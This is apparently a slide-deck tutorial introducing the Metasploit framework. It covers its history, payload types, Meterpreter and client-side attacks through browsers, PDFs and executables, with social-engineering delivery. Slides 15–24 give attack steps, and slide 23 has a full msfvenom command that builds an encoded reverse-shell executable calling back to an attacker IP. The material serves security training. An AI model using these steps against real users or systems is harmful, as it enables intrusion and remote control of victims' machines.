Metasploit is a vulnerability and exploitation framework used by security professionals to ease the burden of performing security assessments. It contains modules divided into exploits, auxiliary, payloads, and post exploitation that allow penetration testing functionality. Some techniques demonstrated in the document include browser, PDF, and executable exploitation using Metasploit payloads to gain remote access shells on target systems.
2. AGENDA
• Introduction to Metasploit
• History of Metasploit
• Exploit
• Payloads
• Auxiliary
• Network Reconnaissance with Metasploit
• Metasploit Payload
• Meterpreter and Post Exploitation
• Client-side Exploitation – Browser , pdf and exe
• References
3.
4. Introduction to
Metasploit
• Vulnerability and exploitation framework designed to ease the burden on
security professionals when it comes to performing security assessments.
• One of the single most useful auditing tools freely available to security
professionals today
• Contains an extensive library of "modules.“
• Each module has a function, and they are divided up into "exploits",
"auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops.
5.
6. History
• Created by H. D. Moore in 2003 as a portable network tool using Perl
• In April, 2004 - With the help of Spoonm, HD released a total rewrite of the
project, Metasploit 2.0 (19 exploits and 27 payloads).
• By 2007, the Metasploit Framework had been completely rewritten in Ruby
• On October 21, 2009, it had been acquired by Rapid7
7. Exploits
• Vectors for Penetrating the systems .
• A software program that has been developed to attack an asset by
taking advantage of a vulnerability.
• Objective of many exploits is to gain control over an asset .
8. Payloads
• A payload in metasploit refers to an exploit module.
• Each exploit can be attached with various payloads like reverse or bind
shells, the meterpreter shell etc.
• A payload is a piece of code to be executed through said exploit.
9. Auxiliary
• Metasploit Framework includes hundreds of auxiliary modules that
perform scanning, fuzzing, sniffing, and much more.
• Although these modules will not give you a shell, they are extremely
valuable when conducting a penetration test.
10. Network Reconnaissance
with Metasploit
• Foundation for any successful penetration test is solid
reconnaissance .
• Gathering enough Information regarding the Target .
• Some examples of Reconnaissance is using nmap tool for port
scanning and identifying services running on the target system .
11. Metasploit Payloads
• Mainly three different types of payload modules in the Metasploit
Framework: Singles, Stagers, and Stages.
• Singles -Self-Contained and Completely Standalone which can be something
as simple as adding a user to the target system or running calc.exe.
• Stagers -Setup a network connection between the attacker and victim and are
designed to be small and reliable
• Stages -payload components that are downloaded by Stagers modules.
Stages provide advanced features with no size limits such as Meterpreter,
VNC Injection, and the iPhone ‘ipwn’ Shell.
12. Meterpreter and Post
Exploitation
• Meterpreter is an advanced, dynamically extensible payload that uses in-
memory DLL injection stagers and is extended over the network at runtime.
• Meterpreter communicates over the stager socket and provides a
comprehensive client-side Ruby API.
• Post-Exploitation is done after the exploitation in-order to maintain the
control of the compromised system for future use .
• Post-Exploitation includes setting up a backdoor to maintain more
permanent system access and covering the tracks .
13. Client-side Exploitation
• Client side attacks require user-interaction such as enticing them to
click a link, open a document, or somehow get to your malicious
website.
• These types of attacks are often delivered by using cleverly worded
emails, sometimes with attachments such as Microsoft Word and PDF
documents.
• Often the attacks is used in conjunction with social engineering
techniques by way of phishing or spear phishing attacks.
14. Browser Exploitation
• Browser Exploitation involves running a browser exploit inorder to
take advantage of a flaw or vulnerability in an operating system or
piece of software with the intent to breach browser security to alter a
user's browser settings without their knowledge.
• Malicious code may exploit ActiveX, HTML, images, Java, JavaScript,
and other Web technologies and cause the browser to run arbitrary
code.
15. In order to use this attack we have to open
the metasploit framework and to use
the browser_autopwn module.
16. Set up the LHOST with your IP
address,the SRVPORT with the port 80
(otherwise the link that we have to send to
the user must me in the format IP:8080)
and the URIPATH with / in order to
prevent metasploit to set up random URL’s.
17. Now we can share the link through our email to our
client employees.If any user opens the malicious link,the
autopwn module will try all these exploits in order to see if it
can break into the client.If the browser is vulnerable to any of
these exploits meterpreter sessions will open.
18. Pdf Exploitation
• Exploiting a system using attacker’s crafted pdf file .
• Mainly targets the system whose pdf reader is vulnerable to some sort
of attacks like buffer overflow .
• Pdf is distributed to the victims by social engineering techniques .
• Sometimes the pdf application fails to perform adequate boundary
checks on user-supplied data then thus system can be attacked by
using pdf exploitation technique .
19. We are going to be using the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer
Overflow Vulnerability.
20. Once we have all the options set the way we want, we run “exploit” to create our malicious file.
We will use msfconsole to set up our multi handler listener
21. Clicking the file opens
Adobe but shows a
greyed out window that
never reveals a PDF.
Instead, on the attackers
machine a meterpreter
session is opened and
thus we have the shell on
the victim system .
22. Exe Exploitation
• Generate an executable from a Metasploit payload inorder to target a
victim through malicious executable file .
• If you can get a user to run your payload for you, there is no reason to
go through the trouble of exploiting any software.
• Generate a reverse shell payload, execute it on a remote system, and
get our shell.
• Best way to do this is to backdoor an executable by embedding it with
malicious payloads .
23. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b
"x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
use ‘multi/handler’ which is a stub that handles exploits launched outside of the framework.
run ‘exploit’ for the multi/handler and execute our generated executable on the victim.
24. The generated executable
can be distributed using
some sort of social
engineering attacks thus as
soon as the executable is
executed on the victim
system it presents the
attacker with the shell of the
victim system .